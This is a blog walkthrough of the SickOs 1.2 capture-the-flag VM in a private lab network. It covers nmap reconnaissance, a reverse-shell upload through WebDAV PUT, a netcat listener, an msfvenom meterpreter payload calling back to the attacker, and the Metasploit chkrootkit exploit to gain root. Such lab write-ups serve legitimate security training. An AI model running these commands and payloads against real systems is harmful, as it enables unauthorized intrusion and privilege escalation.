In this walk through I explain how to solve the SickOs 1.2 challenge. The instructions say to get the highest privileges possible e.g. get root. The download instructions say that you need to use VMware to run this vm. I say fooey to that. Since I’m already a fond user of VirtualBox I fully intended to run it for this challenge. To do so download the image zip file, extract the .vmdk. To run in VirtualBox you just create an new VM, set the OS type Linux, Version Ubuntu 64bit, and select Do not add a virtual hard disk.
Open the new SickOS vm settings and go to Storage settings.
Click the icon to add a new hard disk to the existing controller.
Select Choose existing disk then select the SickOs1.2-disk1.vmdk
Now the VM is ready to boot.
In order to find the IP address of the target I use netdiscover:
netdiscover -r 10.0.2.0/24
Now that the IP address is identified it’s time to profile the target.
root@Oak:~/Downloads/sickos# nmap -A -p- 10.0.2.29 Starting Nmap 7.12 ( https://nmap.org ) at 2016-04-30 11:09 EDT Nmap scan report for 10.0.2.29 Host is up (0.00051s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA) | 2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA) |_ 256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA) 80/tcp open http lighttpd 1.4.28 |_http-server-header: lighttpd/1.4.28 |_http-title: Site doesn't have a title (text/html). MAC Address: 08:00:27:66:76:CF (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.10 - 4.1, Linux 3.16 - 3.19, Linux 3.2 - 4.4 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.51 ms 10.0.2.29 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 114.27 seconds
Ok, port 22 and 80 is open. I start by examining port 80 and I’m met with a keanu conspiracy meme image.
I wasted a lot of time looking at this image for hidden treasures. I used tools such as foremost to see if any other files were combined with the image, I used exiftool to no avail. I then tried steghide to extract hidden messages. I even used Gimp and tried to adjust the color histogram to see if a message was hidden in the negative color.
Nothing… hmm, at this point I moved on from the image. I looked back at the source code of the webpage and noticed there was a message at the bottom.
<!-- NOTHING IN HERE ///\\\ -->>>>
I though the extra > symbols had some meaning but I came up with no explanation.
I decided to continue to probe the http service to see if I can find a way in.
I ran the http-enum nmap script and found a hidden directory.
root@Oak:~# nmap -p80 -sV --script http-enum --script-args http-enum.displayall 10.0.2.29 Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-01 17:09 EDT Nmap scan report for 10.0.2.29 Host is up (0.00022s latency). PORT STATE SERVICE VERSION 80/tcp open http lighttpd 1.4.28 | http-enum: |_ /test/: Test page |_http-server-header: lighttpd/1.4.28 MAC Address: 08:00:27:66:76:CF (Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.24 seconds
The /test directory was empty, so no help there.
I wanted to see what methods are enabled on the http service so I ran the nmap http-methods script.
root@Oak:~# nmap --script http-methods --script-args http.test-all 10.0.2.29 Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-01 17:45 EDT Nmap scan report for 10.0.2.29 Host is up (0.00021s latency). Not shown: 998 filtered ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS MAC Address: 08:00:27:66:76:CF (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 5.00 seconds
Hmm, next I decide to query the options method to see if anything else sticks out as interesting.
Nothing looked interesting at the webroot so then I check the hidden test directory in hopes that maybe its a webdav directory.
root@Oak:~# curl -i -X OPTIONS 10.0.2.29/test HTTP/1.1 301 Moved Permanently DAV: 1,2 MS-Author-Via: DAV Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK Location: http://10.0.2.29/test/ Content-Length: 0 Date: Sun, 01 May 2016 21:26:27 GMT Server: lighttpd/1.4.28
The PUT option looks interesting.
I used the nmap http-put script and was able to upload a PHP reverse shell from Pentestmonkey.
root@Oak:~# nmap -p80 10.0.2.29 --script http-put --script-args http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php' Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-01 17:32 EDT Nmap scan report for 10.0.2.29 Host is up (0.00023s latency). PORT STATE SERVICE 80/tcp open http |_http-put: /test/sicpwn.php was successfully created MAC Address: 08:00:27:66:76:CF (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds
Now to fire up a netcat listenter to catch the connection.
nc -nlvp 443
I triggered the php reverse shell using curl
root@Oak:~# nc -nlvp 443 listening on [any] 443 ... connect to [10.0.2.27] from (UNKNOWN) [10.0.2.29] 53091 Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux 14:56:24 up 36 min, 0 users, load average: 0.02, 0.07, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $
Now at this point I have a low privilege shell. Now it’s time to escalate.
After a bit of looking around I noticed a cron job that runs daily to run chkrootkit. This stood out as something to look into.
ls -la /etc/cron* ... /etc/cron.daily: ... -rwxr-xr-x 1 root root 2032 Jun 4 2014 chkrootkit
I did a google search for chkrootkit exploit and found the EDB entry for a chkrootkit 0.49 – Local Root Vulnerability.
I needed to know if the version running on the target is vulnerable.
$ head /usr/sbin/chkrootkit #! /bin/sh # -*- Shell-script -*- # $Id: chkrootkit, v 0.49 2009/07/30 CHKROOTKIT_VERSION='0.49' # Authors: Nelson Murilo <firstname.lastname@example.org> (main author) and # Klaus Steding-Jessen <email@example.com> # # (c)1997-2009 Nelson Murilo, Pangeia Informatica, AMS Foundation and others.
Cool, it looks like this might be the way to get root. The only problem is that the cron job only runs once a day at 6:25.
$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # $
I created a file called update in /tmp and included a script to add a root user called kaizen.
echo useradd -ou 0 -g 0 kaizen > /tmp/update
The only problem was when 6:25 rolled around nothing happened. At this point I was annoyed.
Next I tried every Ubuntu exploit listed on EDB but none of them worked. I thought surely there had to be a better way than waiting until the next day to try the chkrootkit exploit.
Since nothing else I tried worked and since I didn’t want to wait any more. I decided to fire up my old friend Metasploit.
Metasploit has an exploit for the chkrootkit vulnerability but it requires a session so I created a meterpreter reverse shell with mvfvenom:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.2.27 LPORT=443 -f elf -o sh_rev_443
I used the nmap http-put script to upload the reverse shell
Then setup a metasploit handler to listen.
use exploit/multi/handler msf exploit(handler) > options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (linux/x86/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- DebugOptions 0 no Debugging options for POSIX meterpreter LHOST 10.0.2.27 yes The listen address LPORT 443 yes The listen port msf exploit(handler) > run -j [*] Exploit running as background job. [*] Started reverse TCP handler on 10.0.2.27:443 msf exploit(handler) > [*] Starting the payload handler... [*] Transmitting intermediate stager for over-sized stage...(105 bytes) [*] Sending stage (1495599 bytes) to 10.0.2.29 [*] Meterpreter session 2 opened (10.0.2.27:443 -> 10.0.2.29:55936) at 2016-05-01 12:50:24 -0400
Now I needed to setup the chkrootkit exploit and payload.
msf exploit(handler) > use exploit/unix/local/chkrootkit msf exploit(chkrootkit) > options Module options (exploit/unix/local/chkrootkit): Name Current Setting Required Description ---- --------------- -------- ----------- CHKROOTKIT /usr/sbin/chkrootkit yes Path to chkrootkit SESSION yes The session to run this module on. Exploit target: Id Name -- ---- 0 Automatic msf exploit(chkrootkit) > set lport 443 lport => 443 msf exploit(chkrootkit) > run -j [*] Exploit running as background job. [*] Started reverse TCP double handler on 10.0.2.27:443 msf exploit(chkrootkit) > [!] Rooting depends on the crontab (this could take a while) [*] Payload written to /tmp/update [*] Waiting for chkrootkit to run via cron... [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo TFiotsawCMKjHBKc; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "TFiotsawCMKjHBKc\r\n" [*] Matching... [*] B is input... [*] Command shell session 3 opened (10.0.2.27:443 -> 10.0.2.29:55938) at 2016-05-01 12:52:35 -0400 [+] Deleted /tmp/update
I thought I was going to be waiting for a while, but the exploit was triggered immediately.
msf exploit(chkrootkit) > sessions -i 3 [*] Starting interaction with 3... 1606353480 oAlQqrGWXPVvhovERhaAQpsLuefqCBaT true bniDukHTDahxHIpUOlhgYSUxodJwqfwV GJIQAOHHmgrfXvfvadGjTMXPKbgplxyL PtpPWWwukudKtkYtVpeGFVNptgHBtXwF id uid=0(root) gid=0(root) groups=0(root) ls /root 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt chkrootkit-0.49 newRule
Excellent! I have root!!
And now for the flag:
cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually. Thanks for giving this try. @vulnhub: Thanks for hosting this UP!.
Thanks to @D4rk36 and @Vulnhub for the challenge. It was a fun way to spend a rainy weekend.